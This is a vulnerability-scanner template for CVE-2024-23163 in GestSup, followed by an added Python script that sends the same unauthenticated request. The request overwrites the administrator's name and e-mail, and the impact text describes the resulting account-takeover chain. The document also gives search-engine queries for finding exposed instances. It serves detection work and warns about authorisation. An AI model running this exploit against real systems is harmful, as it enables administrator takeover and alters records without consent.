id: CVE-2024-23163

info:
  name: GestSup - Account Takeover
  author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
  severity: critical
  impact: |
    The /ajax/ticket_user_db.php endpoint accepts a modifyuser request without any authentication. An attacker can overwrite the e-mail address (the usermail field, sent as the mail parameter) of the administrator account (id=1) with an address they control, request a password reset for that account, and then log in to the application as administrator.
  remediation: Apply the security patches or updates provided by the vendor so that the ticket_user_db.php endpoint enforces authentication and authorization before modifying user records.
  reference:
    - https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163
    - https://doc.gestsup.fr/install/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-23163
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    vendor: gestsup
    fofa-query: title="GestSup"
    shodan-query: http.favicon.hash:-283003760
  tags: cve,cve2024,account-takeover,gestsup

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  # Caution: this request is not read-only. A successful run overwrites the
  # first name, last name and e-mail address of user id=1 (the administrator)
  # with the random values above; the original values are not recoverable
  # from the response, so only run it against systems you are authorized to alter.
  - raw:
      - |
        POST /ajax/ticket_user_db.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: xmlhttprequest
        Content-Type: application/x-www-form-urlencoded

        modifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"status":"success'
          - 'firstname":"{{firstname}}","lastname":"{{lastname}}'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

    extractors:
      - type: dsl
        dsl:
          - '"Firstname: "+ firstname'
          - '"Lastname: "+ lastname'
# digest: 490a0046304402205e651225d6d683e62d175bbb93774c7608f54620faf0ea3301776bbb76b043790220374db3481988b620d8025f3cf128c9f5bceb7e3d304460bd868c53518df3f050:922c64590222798bb761d5b6d8e72950
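The following is an added stand-alone reproduction of what the template sends and checks; it is not part of the template, of Nuclei, or of GestSup. It builds the same form body, implements the same matcher logic (both body words must appear, and the Content-Type header must contain text/html), and only performs the live request when run as a script. The base URL, the function names and the sample response body are assumptions for illustration; the sample response is constructed, not captured from a real instance.

```python
"""Added example: reproduce the template's request and matcher logic with the
standard library only. Names, URL and sample data below are assumptions."""
import secrets
import string
import sys
import urllib.parse
import urllib.request

ENDPOINT = "/ajax/ticket_user_db.php"   # endpoint from the template
TARGET_USER_ID = "1"                    # id=1 is the administrator targeted by the template


def rand_base(n: int) -> str:
    """Rough equivalent of Nuclei's {{rand_base(n)}}: n random lowercase letters."""
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(n))


def build_form(firstname: str, lastname: str, email: str, user_id: str = TARGET_USER_ID) -> str:
    """Same URL-encoded body as the template's raw request, in the same field order."""
    fields = [
        ("modifyuser", "1"),
        ("lastname", lastname),
        ("firstname", firstname),
        ("phone", ""),
        ("mobile", ""),
        ("mail", email),
        ("company", "111"),
        ("id", user_id),
    ]
    return urllib.parse.urlencode(fields)


def matches(headers: dict, body: str, firstname: str, lastname: str) -> bool:
    """Re-implementation of the template's matchers (matchers-condition: and).

    Matcher 1 (body, condition: and): '{"status":"success' AND the echoed names.
    Matcher 2 (header): Content-Type contains 'text/html'.
    """
    content_type = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    body_ok = ('{"status":"success' in body
               and f'firstname":"{firstname}","lastname":"{lastname}' in body)
    return body_ok and "text/html" in content_type


def send(base_url: str, firstname: str, lastname: str, email: str, timeout: int = 10):
    """Send the template's request. WARNING: this overwrites the admin user's
    name and e-mail on the target; run only with explicit authorization."""
    data = build_form(firstname, lastname, email).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        data=data,
        method="POST",
        headers={
            "X-Requested-With": "xmlhttprequest",
            "Content-Type": "application/x-www-form-urlencoded",
        },
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:  # noqa: S310 (assumed trusted target)
        return dict(resp.headers.items()), resp.read().decode(errors="replace")


def main(argv):
    if len(argv) != 2:
        print(f"usage: {argv[0]} https://gestsup.example.test", file=sys.stderr)
        return 2
    firstname, lastname = rand_base(5), rand_base(5)
    email = f"{rand_base(10)}@{rand_base(5)}.com"
    headers, body = send(argv[1], firstname, lastname, email)
    if matches(headers, body, firstname, lastname):
        print(f"vulnerable: admin record changed (Firstname: {firstname}, Lastname: {lastname})")
        return 0
    print("no match")
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The matcher is deliberately strict: a bare `{"status":"success` is not enough, the response must also echo the exact random first and last names that were sent, which rules out a generic success page. As with the template itself, a positive result means the administrator record has already been modified.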